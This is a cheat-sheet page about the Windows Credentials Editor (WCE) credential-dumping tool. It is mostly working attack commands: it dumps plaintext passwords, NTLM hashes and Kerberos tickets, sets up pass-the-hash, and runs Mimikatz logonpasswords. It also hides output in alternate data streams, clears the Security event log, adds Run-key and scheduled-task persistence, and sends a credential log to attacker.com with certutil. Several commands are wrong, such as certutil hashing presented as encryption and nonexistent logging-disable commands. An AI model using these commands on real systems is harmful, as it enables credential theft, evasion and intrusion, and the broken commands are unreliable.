WCE (Windows Credentials Editor)
Overview
섹션 제목: “Overview”WCE (Windows Credentials Editor) is a specialized tool for extracting and manipulating Windows credentials from memory. It allows authorized security professionals to view plaintext passwords, NTLM hashes, and Kerberos tickets from running processes. WCE is used in authorized penetration testing, red team exercises, and security research on Windows systems.
Prerequisites
섹션 제목: “Prerequisites”- Windows system with administrator privileges
- Understanding of Windows credential storage mechanisms
- Authorization to perform credential testing
Installation
섹션 제목: “Installation”Direct Download
섹션 제목: “Direct Download”Download the precompiled binary from the official release site:
# Download wce.exe
# SHA256: Verify checksum before execution
certutil -hashfile wce.exe SHA256Compilation (Optional)
섹션 제목: “Compilation (Optional)”# For advanced users compiling from source
# Requires Windows development environment
# gcc or MSVC toolchain
gcc -o wce.exe wce.cFile Structure
섹션 제목: “File Structure”wce/
├── wce.exe # Main executable (32-bit)
├── wce-universal.exe # Universal binary
├── README.txt
└── CHANGELOGBasic Commands
섹션 제목: “Basic Commands”| Command | Description |
|---|---|
wce -l | List all credentials in memory |
wce -c | Display running processes with credentials |
wce -g | Get credentials from specific process |
wce -s | Start process and extract credentials |
wce -k | Extract Kerberos tickets |
wce -n | Extract NTLM hashes |
wce -w | Write credentials to file |
wce -h | Display help information |
Credential Extraction
섹션 제목: “Credential Extraction”List All Credentials
섹션 제목: “List All Credentials”# Extract all credentials from memory
wce -l
# Output example:
# User: DOMAIN\Administrator
# Password: P@ssw0rd123
# Hash: 8846f7eaee8fb117ad06bdd830b7586cExtract from Specific Process
섹션 제목: “Extract from Specific Process”# Get credentials from a specific PID
wce -l -s ProcessName
# Get credentials from explorer.exe
wce -l -s explorer.exe
# Get credentials from svchost.exe
wce -l -s svchost.exeVerbose Output
섹션 제목: “Verbose Output”# Detailed credential information
wce -l -v
# Shows:
# - Username
# - Domain
# - Plaintext password
# - NTLM hash
# - Process ID
# - Credential typeNTLM Hash Extraction
섹션 제목: “NTLM Hash Extraction”Extract NTLM Hashes
섹션 제목: “Extract NTLM Hashes”# Get all NTLM hashes from memory
wce -l -n
# Output format:
# username:domain:lmhash:ntmhash
# Administrator:WORKGROUP:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cSave Hashes to File
섹션 제목: “Save Hashes to File”# Export hashes for crack attempt
wce -l -n > hashes.txt
# Format for hashcat/john:
# username:uid:lmhash:ntmhash:::Identify Hash Types
섹션 제목: “Identify Hash Types”# Determine which hashes are present
wce -l -n | findstr /v "aad3b435b51404eeaad3b435b51404ee"
# aad3b435b51404eeaad3b435b51404ee is empty LM hash indicatorKerberos Ticket Extraction
섹션 제목: “Kerberos Ticket Extraction”Extract Kerberos Tickets
섹션 제목: “Extract Kerberos Tickets”# List all Kerberos tickets in memory
wce -l -k
# Output shows:
# - Service ticket granting ticket (TGT)
# - Service tickets (ST)
# - Session keysExport Tickets for Pass-the-Ticket
섹션 제목: “Export Tickets for Pass-the-Ticket”# Extract ticket in base64 format
wce -l -k -b > tickets.txt
# Import and use with ptk tools
# or Mimikatz pass-the-ticket functionalityProcess Monitoring
섹션 제목: “Process Monitoring”Monitor Running Processes
섹션 제목: “Monitor Running Processes”# List processes with cached credentials
wce -c
# Shows active processes with credential handles
# Useful for targeting services and system processesDump Credentials from Service Account
섹션 제목: “Dump Credentials from Service Account”# Target specific service
wce -l -s "SQL Server (MSSQLSERVER)"
# Target IIS application pool
wce -l -s "w3wp.exe"
# Target backup service
wce -l -s "mbsvc.exe"Advanced Usage
섹션 제목: “Advanced Usage”Silent Extraction Mode
섹션 제목: “Silent Extraction Mode”# Extract without user feedback
wce -l -s ProcessName -w output.txt
# Redirect all output to file
# Useful for automated red team operationsFilter Credentials by Domain
섹션 제목: “Filter Credentials by Domain”# Extract only domain credentials
wce -l | findstr "DOMAIN\"
# Extract local machine credentials
wce -l | findstr /v "DOMAIN"Continuous Monitoring
섹션 제목: “Continuous Monitoring”# Monitor for new credentials over time
wce -l > credentials_snapshot.txt
# Wait and capture changes
timeout /t 300
wce -l > credentials_update.txt
# Compare snapshots
fc credentials_snapshot.txt credentials_update.txtIntegration with Other Tools
섹션 제목: “Integration with Other Tools”Pass-the-Hash with WCE
섹션 제목: “Pass-the-Hash with WCE”# Extract NTLM hash
wce -l -n > hashes.txt
# Use with PsExec pass-the-hash:
# psexec.exe -h \\targethost -u DOMAIN\user -p :ntmhash cmd.exeCredential Dumping Pipeline
섹션 제목: “Credential Dumping Pipeline”# Extract and prepare for cracking
wce -l -n | sed 's/:.*$//' > usernames.txt
wce -l -n | sed 's/.*://' > hashes.txt
# Match for rainbow table lookup
# or GPU cracking with hashcatIntegration with Mimikatz
섹션 제목: “Integration with Mimikatz”# WCE focuses on memory extraction
# Mimikatz handles encryption/logonsessions
# Complement with Mimikatz:
# mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
# Compare results for complete credential auditSecure Credential Handling
섹션 제목: “Secure Credential Handling”Encrypt Exported Credentials
섹션 제목: “Encrypt Exported Credentials”# Export and encrypt immediately
wce -l > creds.txt
# Encrypt output
certutil -hashfile creds.txt SHA256
# Delete original
del /secure creds.txtLog Credential Access
섹션 제목: “Log Credential Access”# Create audit trail
echo [%date% %time%] WCE executed by %username% >> audit.log
wce -l >> audit.log
# Encrypt audit log
cipher /e /s:%cd% audit.logDetection and Evasion
섹션 제목: “Detection and Evasion”Stealth Extraction
섹션 제목: “Stealth Extraction”# Run from temporary location
cd %temp%
wce.exe -l > output.txt
# Use alternate data streams (Windows)
wce.exe -l > output.txt:hidden
# Clean temporary artifacts
del output.txtTiming Considerations
섹션 제목: “Timing Considerations”# Extract during user logon/logoff
# When credentials are most likely in memory
# Target peak hours for service credentials
# Avoid antivirus scan windowsTroubleshooting
섹션 제목: “Troubleshooting”No Credentials Found
섹션 제목: “No Credentials Found”# Issue: No credentials displayed
# Solution 1: Verify admin privileges
whoami /priv | findstr SeDebugPrivilege
# Solution 2: Check for 64-bit vs 32-bit mismatch
wce.exe -l # 32-bit
# Try 64-bit version for x64 systemsAccess Denied Error
섹션 제목: “Access Denied Error”# Issue: "Access Denied" when running WCE
# Solution: Run as Administrator
# Method 1: Right-click Run as Administrator
# Method 2: From admin command prompt
wce.exe -l
# Method 3: Schedule as SYSTEM
schtasks /create /tn "CredDump" /tr "wce.exe -l" /sc once /st 12:00Missing Credentials
섹션 제목: “Missing Credentials”# Issue: Expected credentials not shown
# Possible causes:
# 1. Credentials cleared from memory
# 2. User not logged in
# 3. Process permissions restrict access
# Solution: Check active sessions
wce -c
# Wait for user to interact with system
# Credentials cached when passwords enteredOperational Security
섹션 제목: “Operational Security”OPSEC Best Practices
섹션 제목: “OPSEC Best Practices”# 1. Use temporary filenames
set /p filename=<nul
wce.exe -l > %random%.txt
# 2. Compress and encrypt output
wce.exe -l | gzip > creds.gz
# Transfer via encrypted channel
# 3. Delete WCE and artifacts
del wce.exe
del %random%.txtDetection Mitigation
섹션 제목: “Detection Mitigation”# 1. Disable Windows Update notifications
# 2. Clear event logs
wevtutil cl Security
# 3. Remove command history
history -c
# 4. Close all logging
# Disable PowerShell logging
powershell -NoProfile -Command "Disable-PSLogging"Practical Examples
섹션 제목: “Practical Examples”Red Team Credential Harvesting
섹션 제목: “Red Team Credential Harvesting”# Establish persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cred" /d "C:\Windows\Temp\wce.exe -l > C:\Windows\Temp\log.txt"
# Create scheduled task for periodic dumps
schtasks /create /tn "System Maintenance" /tr "C:\Windows\Temp\wce.exe -l >> C:\Windows\Temp\log.txt" /sc hourly
# Exfiltrate credentials
certutil -urlcache -f "http://attacker.com/upload.php?data=" log.txtPrivilege Escalation Chain
섹션 제목: “Privilege Escalation Chain”# 1. Get current user credentials
wce -l -s explorer.exe
# 2. Extract service account credentials
wce -l -s svchost.exe
# 3. Use extracted credentials for lateral movement
# psexec -u DOMAIN\serviceaccount -p password \\target cmd.exeCredential Audit
섹션 제목: “Credential Audit”# Comprehensive audit script
@echo off
echo [*] WCE Credential Audit - %date% %time%
wce -l -v >> audit_report.txt
echo.
echo [*] NTLM Hashes:
wce -l -n >> audit_report.txt
echo.
echo [*] Kerberos Tickets:
wce -l -k >> audit_report.txt
echo Audit complete - results in audit_report.txtComparison with Similar Tools
섹션 제목: “Comparison with Similar Tools”| Tool | Purpose | Focus |
|---|---|---|
| WCE | Plaintext password extraction | Windows credentials in memory |
| Mimikatz | Complete Windows security analysis | Encryption, logon sessions |
| ProcDump | Memory dump utility | Generic process memory |
| PowerSploit | PowerShell exploitation framework | Full Windows exploitation |
| Responder | LLMNR/NBNS poisoning | Network credential capture |
Limitations
섹션 제목: “Limitations”- Requires admin privileges
- Plaintext passwords limited to cached/active sessions
- Works primarily on Windows systems
- Modern credential guard may limit effectiveness
- Service account passwords vary by running context
Related Tools
섹션 제목: “Related Tools”- Mimikatz: More comprehensive Windows exploitation
- Responder: Network-based credential capture
- LaZagne: Cross-platform credential recovery
- CrackMapExec: Lateral movement and credential testing
References
섹션 제목: “References”- Windows Credentials Editor Repository
- NTLM Hash Specification Microsoft Docs
- Kerberos Authentication RFC 4120
- Credential Guard Microsoft Security Blog
Legal Notice
섹션 제목: “Legal Notice”WCE is designed for authorized security testing, red team exercises, and defensive research. Unauthorized access to computer systems is illegal. Only use on systems you own or have explicit written permission to test.